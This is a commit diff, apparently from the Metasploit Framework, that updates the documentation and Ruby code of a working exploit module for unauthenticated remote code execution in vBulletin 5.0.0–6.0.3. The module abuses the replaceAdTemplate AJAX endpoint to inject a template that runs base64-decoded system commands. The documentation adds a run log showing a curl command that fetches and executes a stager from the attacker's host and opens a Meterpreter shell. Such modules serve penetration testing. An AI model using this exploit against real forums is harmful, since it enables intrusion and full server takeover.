Add verbosity, update doc

Author: Chocapikk

documentation/modules/exploit/multi/http/vbulletin_replace_ad_template_rce.md

@@ -144,15 +144,29 @@ set TARGETURI /
 
 ```plaintext
 msf6 exploit(multi/http/vbulletin_replace_ad_template_rce) > run http://lab:8888
+[*] Command to run on remote host: curl -so ./BGZuzbsi http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./BGZuzbsi;./BGZuzbsi&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
+[*] Starting vulnerability check on 127.0.0.1:8888/
+[*] Generating random marker and condition for mode check
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=QuFcp)
+[*] Injection response: HTTP 200
+[+] Marker found in injection response body
 [+] The target is vulnerable.
+[*] Generating random marker and condition for mode exploit
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=XSGFS)
+[*] Client 172.28.0.3 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.28.0.3 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
 [*] Sending stage (3045380 bytes) to 172.28.0.3
-[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.28.0.3:56812) at 2025-05-25 19:49:44 +0200
+[*] Meterpreter session 8 opened (192.168.1.36:4444 -> 172.28.0.3:53014) at 2025-05-29 16:27:00 +0200
 
 meterpreter > sysinfo
 Computer     : 172.28.0.3
-OS           : Debian 12.11 (Linux 6.14.6-2-cachyos)
+OS           : Debian 12.11 (Linux 6.14.8-2-cachyos)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

modules/exploits/multi/http/vbulletin_replace_ad_template_rce.rb

@@ -17,13 +17,13 @@ def initialize(info = {})
         'Description' => %q{
           This module exploits a design flaw in vBulletin's AJAX API handler and template rendering system,
           present in versions 5.0.0 through 6.0.3. The vulnerability allows unauthenticated attackers
-          to invoke protected controller methods via the `ajax/api/ad/replaceAdTemplate` endpoint,
+          to invoke protected controller methods via the ajax/api/ad/replaceAdTemplate endpoint,
           due to improper use of PHP's Reflection API in combination with changes in PHP 8.1+.
 
-          Specifically, it targets the `vB_Api_Ad::replaceAdTemplate()` method to inject a template
-          containing a `<vb:if>` conditional that evaluates attacker-supplied PHP using the
-          `"system"($_POST[<param>])` construct. The malicious template is then executed via
-          a second unauthenticated request to `ajax/render/ad_<location>`.
+          Specifically, it targets the vB_Api_Ad::replaceAdTemplate() method to inject a template
+          containing a <vb:if> conditional that evaluates attacker-supplied PHP using the
+          "system"($_POST[<param>]) construct. The malicious template is then executed via
+          a second unauthenticated request to ajax/render/ad_<location>.
 
           Successful exploitation results in arbitrary command execution as the webserver user,
           without authentication. This module supports payloads for PHP, Linux, and Windows.
@@ -72,7 +72,8 @@ def initialize(info = {})
   end
 
   def check
-    inject_and_trigger(:check) ? CheckCode::Appears : CheckCode::Safe
+    vprint_status("Starting vulnerability check on #{rhost}:#{rport}#{target_uri.path}")
+    inject_and_trigger(:check) ? CheckCode::Vulnerable : CheckCode::Safe
   end
 
   def exploit
@@ -83,48 +84,60 @@ def inject_and_trigger(mode, payload: nil)
     marker, location, param = Array.new(3) { Rex::Text.rand_text_alpha(5, 8) }
     pattern = /string\(#{marker.length}\) "#{marker}"/
 
+    vprint_status("Generating random marker and condition for mode #{mode}")
     if mode == :check
       condition = %{"var_dump"("#{marker}")}
       trigger_value = Rex::Text.encode_base64(marker)
     else
       encoded_payload = Rex::Text.encode_base64(payload)
+      # Sadly we can't use `eval()` here as it's a language construct and we need a proper function.
       condition = %{"system"("base64_decode"("#{encoded_payload}"))}
     end
 
     template = "<vb:if condition='#{condition}'></vb:if>"
 
+    vprint_status("Sending POST to ajax/api/ad/replaceAdTemplate (location=#{location})")
     inj = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path),
       'vars_post' => {
         'routestring' => 'ajax/api/ad/replaceAdTemplate',
-        'styleid' => '1',
+        'styleid' => '1', # Can't randomize this value
         'location' => location,
         'template' => template
       }
     )
 
     if mode == :check
-      return false unless inj&.code == 200
-      return true if inj.body.match?(pattern)
-      false
-    end
-
-    render_vars = { 'routestring' => "ajax/render/ad_#{location}" }
-    render_vars[param] = trigger_value if mode == :check
-
-    render = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path),
-      'vars_post' => render_vars
-    )
+      return true if handle_check_response(inj, pattern, 'injection')
 
-    if mode == :check
-      return nil unless render&.code == 200
+      render_vars = { 'routestring' => "ajax/render/ad_#{location}" }
+      render_vars[param] = trigger_value
 
-      return render.body.match?(pattern)
+      vprint_status("Sending POST to ajax/render/ad_#{location} to trigger execution")
+      render = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'vars_post' => render_vars
+      )
+      return handle_check_response(render, pattern, 'trigger')
     end
 
     true
   end
+
+  def handle_check_response(response, pattern, stage)
+    vprint_status("#{stage.capitalize} response: HTTP #{response&.code}")
+    unless response&.code == 200
+      vprint_error("#{stage.capitalize} request failed (HTTP #{response&.code || 'nil'})")
+      return false
+    end
+    if response.body.match?(pattern)
+      vprint_good("Marker found in #{stage} response body")
+      true
+    else
+      vprint_error("Marker not found in #{stage} response body")
+      false
+    end
+  end
 end